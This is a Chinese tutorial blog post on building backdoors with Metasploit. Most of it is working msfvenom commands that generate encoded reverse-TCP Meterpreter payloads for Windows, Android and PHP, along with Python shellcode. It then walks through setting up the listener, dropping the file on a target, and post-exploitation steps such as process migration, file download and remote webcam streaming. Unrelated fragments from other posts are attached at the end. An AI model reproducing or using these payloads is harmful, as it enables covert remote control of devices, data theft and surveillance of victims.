通過Metasploit生成各種後門

2022-06-22 11:33:10 字數 3559 閱讀 1671

生成windows後門

1.首先生成後門

[root@localhost ~]#msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.1 lport=6666 -f exe > ./lyshark.exe

2.進入metasploit,執行以下操作

msf > use exploit/multi/handler

msf exploit(multi/handler) >

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.25
lhost => 192.168.1.25msf exploit(multi/handler) > set lport 6666lport => 6666

msf exploit(multi/handler) >exploit

[*] started reverse tcp handler on 192.168.1.25:6666[*] sending stage (179779 bytes) to 192.168.1.10[*] meterpreter session 1 opened (192.168.1.25:6666 -> 192.168.1.10:54264) at 2018-06-02 02:24:17 -0400

3.將我們的(lyshark.exe)拷貝到目標主機並執行

4.攻陷後常用查詢命令

ps         #檢視程序

migrate      #注入程序

run vnc      #檢視遠端桌面

sessions -l  #檢視會話

backgroud    #退出當前會話

生成android後門

1.首先生成後門

[root@localhost ~]#msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.1 lport=6666 r > ./lyshark.apk

2.進入metasploit,執行以下操作

msf >use exploit/multi/handlermsf exploit(multi/handler) >msf exploit(multi/handler) >set payload android/meterpreter/reverse_tcppayload => android/meterpreter/reverse_tcp

msf exploit(multi/handler) >set lhost 192.168.1.1lhost => 192.168.1.1

msf exploit(multi/handler) >set lport 6666lport => 6666

msf exploit(multi/handler) >exploit[-] handler failed to bind to 192.168.1.1:6666:- -[*] started reverse tcp handler on 0.0.0.0:6666

3.將我們的(lyshark.apk)拷貝到目標主機並執行

4.此時主機已經淪陷,檢視一下系統吧

常用命令:

search #搜尋 search -f *.jpg

download

webcam_stream -i 1/2

#開啟前置或後置攝像頭

check_root #檢測root

生成php後門

1.首先生成後門

[root@localhost ~]#msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.1.1 lport=6666 -f raw > ./lyshark.php

2.進入metasploit,執行以下操作

msf >use exploit/multi/handler

msf exploit(multi/handler) >msf exploit(multi/handler) >set payload php/meterpreter_reverse_tcppayload => php/meterpreter_reverse_tcp

msf exploit(multi/handler) >set lhost 192.168.1.1lhost => 192.168.1.1

msf exploit(multi/handler) >set lport 6666lport => 6666

msf exploit(multi/handler) >exploit -j

[*] exploit running as background job 0

.msf exploit(multi/handler) >[-] handler failed to bind to 192.168.1.1:6666:- -[*] started reverse tcp handler on 0.0.0.0:6666

3.將我們的(lyshark.php)拷貝到目標網頁根路徑

生成shellcode

1.生成shell    <-e 使用編碼 - i 編碼次數》

[root@localhost ~]#msfvenom -p windows/meterpreter/reverse_tcp lport=6666 lhost=192.168.1.1 -e x86/shikata_ga_nai -i 11 -f py > lyshark.py

通過dll生成lib

大家知道,使用dll的時候有2種方式 第一種是 loadlibrary getprocaddress 第二種是 使用lib檔案或 pragma comment lib,yourlib.lib 有時候你只有dll和標頭檔案,沒有lib檔案,這時候要乙個個的getprocadress,很麻煩。想偷懶的話...

通過Mesh生成網格

gameobject obj new gameobject go meshfilter mf obj.addcomponent meshrenderer mr obj.addcomponent 新增乙個材質球 mr.sharedmaterial resources.load material 第乙個...

java通過模板生成 word

最近專案要匯出world的報告,在網上查閱了下相關資料。發現使用模板方式比較適合我們的專案。為自己記錄下.1.建立word文件,並另存為xml格式.3.使用模板生成 word文件.這裡簡單說下另存為後的xml模板 我使用的是word2007.如果存在,模板中會有類似這樣語法 這裡要注意的是,id不能...